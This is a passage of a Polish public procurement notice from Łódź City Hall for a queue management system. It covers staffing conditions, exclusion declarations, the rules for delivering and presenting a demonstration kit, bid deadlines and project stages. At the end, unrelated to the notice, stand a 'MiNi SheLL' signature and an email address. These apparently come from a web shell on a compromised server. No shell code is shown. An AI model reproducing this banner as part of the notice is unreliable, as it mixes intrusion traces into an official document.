pełnieniu funkcji Kierownika Projektu,<br/>10.1.4.2.2.	co najmniej 3 programistami, z których minimum 1 posiada co najmniej dwuletnie doświadczenie w zakresie tworzenia systemów informatycznych lub w ich utrzymywaniu przy użyciu wszystkich wymienionych poniżej oprogramowań narzędziowych:<br/>1)	HTML<br/>2)	CSS<br/>3)	JavaScript<br/>4)	SQL<br/>5)	Technologie backendowe wykorzystywane w budowie/eksploatacji oferowanego systemu<br/>10.1.4.2.3.	co najmniej 2 osobowym zespołem serwisowym, w którym co najmniej 1 osoba posiada min. 3 letnie doświadczenie w serwisowaniu, instalacji i wymianie automatów biletowych i związanego z nimi oprzyrządowania<br/>Uwaga:<br/>Zamawiający nie dopuszcza możliwości łączenia funkcji pełnionych przez osoby wymienione w pkt. 10.1.4.2.1– 10.1.4.2.3 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">[Numeracja zgodna z SWZ]<br/>11.5.1.	Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>11.5.1.1.	art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczących wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,<br/>11.5.1.2.	art. 108 ust.1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>11.5.1.3.	art. 108 ust. 1 pkt 5 ustawy Pzp dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>11.5.1.4.	art. 108 ust. 1 pkt 6 ustawy Pzp dotyczących zakłócenia konkurencji wynikającego z wcześniejszego zaangażowania Wykonawcy lub podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej, w przygotowanie postępowania o udzielenie zamówienia<br/>11.5.1.5.	art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>– zgodnie z Załącznikiem nr 5a do SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z tych Wykonawców (dotyczy również wspólników spółki cywilnej).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">[Numeracja zgodna z SWZ] <br/>11.5.2.	Wykaz dostaw (wg wzoru – Załącznik nr 6 do SWZ) wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie przy czym dowodami, o których mowa, są:<br/>11.5.2.1	referencje,<br/>11.5.2.2	bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego dostawy zostały wykonane,<br/>11.5.2.3	jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy<br/><br/>11.5.3.	Wykaz osób (wg wzoru – Załącznik nr 7 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę, jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami<br/>11.6.	Okres wyrażony w latach, o którym mowa w pkt 11.5.2 SWZ liczy się wstecz od dnia, w którym upływa termin składania ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> [Numeracja zgodna z SWZ]<br/>7.1	Zamawiający wymaga złożenia przez Wykonawcę przedmiotowych środków dowodowych na które składać się będzie zestaw do prezentacji Systemu. Przedmiotowe środki dowodowe Wykonawca składa do upływu terminu składania ofert o którym mowa w pkt. 22.3 SWZ w Wydziale Informatyki w Departamencie Organizacji Urzędu i Obsługi Mieszkańców Urzędu Miasta Łodzi ul. Piotrkowska 104, 90-926 Łódź Budynek B w godzinach pracy Zamawiającego, tj. 8:00 – 16:00 w dni robocze, za wyjątkiem wtorku w godzinach pracy 9:00 – 17:00.<br/>1.	Prezentowany System będzie składał się z następujących komponentów:<br/>a)	1 automat biletowy,<br/>b)	1 monitor zbiorczy z komputerem sterującym,<br/>c)	1 wyświetlacz stanowiskowy,<br/>d)	wszystkie komponenty Oprogramowania oraz – do celów prezentacji dostęp do własnej bramki sms,<br/>e)	komputer dla serwera centralnego oraz urządzenia do prezentacji pracy aplikacji do obsługi stanowiska,<br/>f)	komplet kabli i przewodów połączeniowych niezbędnych do przeprowadzenia prezentacji<br/>Nie dostarczenie zestawu, albo dostarczenie zestawu niekompletnego skutkuje odrzuceniem oferty. Elementy wchodzące w skład zestawu powinny być zapakowane, opisane i oznaczone w sposób uniemożliwiający dostęp do zawartości bez uszkodzenia opakowania, elementy bądź opakowanie zbiorcze powinno zawierać informację:<br/>nazwa (firma) Wykonawcy<br/>adres Wykonawcy<br/>Urząd Miasta Łodzi<br/>Wydział Informatyki<br/>Piotrkowska 104<br/>90-926 Łódź<br/><br/>	„Zakup Systemu Kolejkowego dla UMŁ oraz Rozszerzonej Gwarancji”<br/><br/>	nr ref.: DOM-WZP-II.271.42.2024<br/><br/>Wykonawca odpowiada za dostarczenie (przeniesienie) zestawu do wskazanego miejsca magazynowania. W celu uzyskania dostępu do magazynu należy skontaktować się z sekretariatem Wydziału Informatyki tel. 42 638-41-55. Po dostarczeniu zestawu Wykonawca otrzyma pokwitowanie, zawierające godzinę i datę wpływu, jak również podpis odbierającego. Wykonana zostanie dokumentacja fotograficzna.<br/>2.	Zestawy o których mowa w pkt. 1 będą przechowywane w zamkniętym pomieszczeniu, w siedzibie Zamawiającego przy ul. Piotrkowskiej 104, do czasu zakończenia postępowania przetargowego.<br/>W dniu prezentacji Zamawiający zweryfikuje osoby, które są przedstawicielami Wykonawców i będą dokonywały prezentacji. W tym celu każda z osób biorących udział w prezentacji winna być uprawniona do reprezentacji Wykonawcy zgodnie z reprezentacją wynikającą z KRS/CEiDG lub być upoważniona do reprezentacji Wykonawcy na postawie udzielonego pełnomocnictwa. Pełnomocnictwo dla osoby/osób biorących udział w prezentacji ze strony Wykonawcy winno być załączone do oferty lub przesłane do Zamawiającego przed terminem rozpoczęcia prezentacji zgodnie z komunikacją wskazaną w SWZ tj. za pośrednictwem Platformy, która jest dostępna pod adresem https://uml.ezamawiajacy.pl. W przypadku braku odpowiedniego dokumentu potwierdzającego prawo do reprezentowania Wykonawcy dana osoba nie może wziąć udziału w prezentacji.<br/>3.	Celem prezentacji jest weryfikacja zgodności zadeklarowanych funkcjonalności i cech Systemu ze stanem faktycznym oraz wypełnienia kryteriów oceny ofert. W przypadku, gdy przy użyciu dostarczonego zestawu nie będzie możliwe zaprezentowanie wszystkich zadeklarowanych przez Wykonawcę funkcjonalności z kryterium oceny ofert, Wykonawca otrzyma 0 pkt w kryterium oceny ofert którego nie zaprezentował.<br/>4.	Wykonawca dokona prezentacji funkcjonalności i cech Systemu wskazanych <br/>w Załączniku nr 1 do niniejszego dokumentu, przy czym w zakresie wypełnienia kryteriów oceny ofert Wykonawca jest obowiązany dokonać prezentacji jedynie <br/>w zakresie złożonej przez siebie oferty. Punkty w kryterium oceny ofert zostaną przyznane na podstawie prezentacji Systemu.<br/>5.	Uzyskanie pozytywnych ocen wszystkich funkcjonalności podstawowych, o których mowa w pkt 4 podczas prezentacji jest warunkiem niezbędnym do zawarcia Umowy. <br/>Uzyskanie pozytywnych ocen w zakresie kryteriów oceny ofert jest warunkiem przyznania za nie punktów.<br/>c.d. informacji o przedmiotowych środkach dowodowych w informacjach dod. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> [Numeracja zgodna z SWZ]<br/>13.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>13.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden <br/>z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 t.j.) natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt. 10.1 SWZ.<br/>13.3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt. 11.3. SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału, w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>13.4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>13.5.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, są oni zobowiązani, na wezwanie Zamawiającego, złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których mowa w pkt. 11.5 SWZ. <br/>	podmiotowe środki dowodowe, o których mowa w pkt 11.5.2 i 11.5.3 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/wykazują spełnianie warunku, w zakresie i na zasadach opisanych w pkt 10.1 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres i warunki zmian zawartej umowy - kwestie odnoszące się do umowy są uregulowane we wzorze umowy (Załącznik nr 8 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">22.1 Ofertę należy złożyć na Platformie pod adresem: https://uml.ezamawiajacy.pl Po zalogowaniu się i przejściu do konkretnego postępowania Wykonawca wybiera kafelek „FORMULARZ OFERTY/WNIOSKU” lub wybiera sekcję „Przygotowanie oferty”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> [Numeracja zgodna z SWZ]<br/>36.1.	Zamawiający nie przewiduje:<br/>36.1.1.	zawarcia umowy ramowej<br/>36.1.2.	złożenia oferty warunkowanego odbyciem przez Wykonawcę wizji lokalnej lub sprawdzeniem przez Wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego (art. 131 ust. 2 ustawy Pzp) sprawdzenia przez Wykonawcę dokumentów niezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego.<br/>36.1.3.	składania ofert wariantowych i częściowych,<br/>36.1.4.	rozliczania w walutach obcych,<br/>36.1.5.	zwrotu kosztów udziału w postępowaniu,<br/>36.1.6.	wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej,<br/>36.1.7.	wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty,<br/>36.1.8.	udzielenia zamówień, o których mowa art. 214 ust. 1 pkt 7 ustawy Pzp<br/><br/>36.3.	Zamawiający przed wszczęciem postępowania nie przeprowadził wstępnych konsultacji rynkowych.<br/>36.4.	Zakres i warunki zmian zawartej umowy - kwestie odnoszące się do umowy są uregulowane we wzorze umowy (Załącznik nr 8 do SWZ)<br/><br/>Termin wykonania zamówienia:<br/>Termin wykonania zamówienia: od dna zawarcia umowy do dnia 31.12.2029 r. Realizacja Wdrożenia następować będzie w podziale na Etapy:<br/>1)	Etap I zostanie wykonany w terminie do 14 dni od dnia zawarcia umowy,<br/>2)	Etap II zostanie wykonany w terminie do 7 dni od odbioru Etapu I,<br/>3)	Etap III zostanie wykonany do 7 dni od odbioru Etapu II,<br/>4)	Etap IV zostanie wykonany w terminie 21 dni od odbioru Etapu III,<br/>5)	Etap V do dnia 31.12.2029 r.<br/><br/>Ciąg dalszy informacji o przedmiotowych środkach dowodowych:<br/>6.	Dla uzyskania pozytywnej oceny, o której mowa w pkt 5, jak również pozytywnych ocen wypełnienia kryteriów oceny wymagana jest jednomyślność merytorycznych członków komisji przetargowej Zamawiającego.<br/>7.	Dany Wykonawca może dokonać prezentacji Systemu tylko raz.<br/>8.	W przypadku uzyskania chociaż jednej oceny negatywnej przynajmniej jednej funkcjonalności podstawowej, jak również niestawienia się Wykonawcy na zaproszenie <br/>w wyznaczonym terminie jego oferta zostanie odrzucona. Na Wykonawcy spoczywa obowiązek odtworzenia Systemu w takim zakresie, aby możliwe było nie budzące wątpliwości odwzorowanie sprawdzanych funkcjonalności. Prezentowany System będzie składał się z następujących elementów:<br/>1)	1 automat biletowy<br/>2)	1 monitor zbiorczy z komputerem sterującym<br/>3)	1 wyświetlacz stanowiskowy<br/>4)	wszystkie komponenty Oprogramowania oraz – do celów prezentacji dostęp do własnej bramki sms<br/>5)	Komputer dla serwera centralnego oraz urządzenia do prezentacji pracy aplikacji do obsługi stanowiska<br/>6)	komplet kabli i przewodów połączeniowych niezbędnych do przeprowadzenia prezentacji.<br/>9.	Bazy danych używane podczas testu Oprogramowania muszą zawierać dane testowe <br/>w ilości nie mniejszej niż 50 tys. rekordów symulujących dane indywidualnych wizyt.<br/>10.	Zamawiający nie przewiduje pokrycia kosztów przygotowania i przeprowadzenia prezentacji.<br/>11.	Zamawiający nie przewiduje wykorzystania zestawu, o którym mowa w pkt 8 do celów innych niż przeprowadzenie prezentacji Systemu.<br/>12.	Zamawiający nie ponosi odpowiedzialności za:<br/>i.	złożenie przez Wykonawcę zestawu po wyznaczonym terminie,<br/>ii.	złożenie zestawu w innym niż określonym przez Zamawiającego miejscu,<br/>iii.	złożenie elementów zestawu do prezentacji w opakowaniu nieopisanym, uniemożliwiającym jego identyfikację lub postępowania, którego dotyczy<br/>13.	Zamawiający nie przewiduje pokrycia kosztów przygotowania zestawu do prezentacji.<br/>14.	Zamawiający nie dopuszcza zmiany terminu prezentacji.<br/>7.2	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com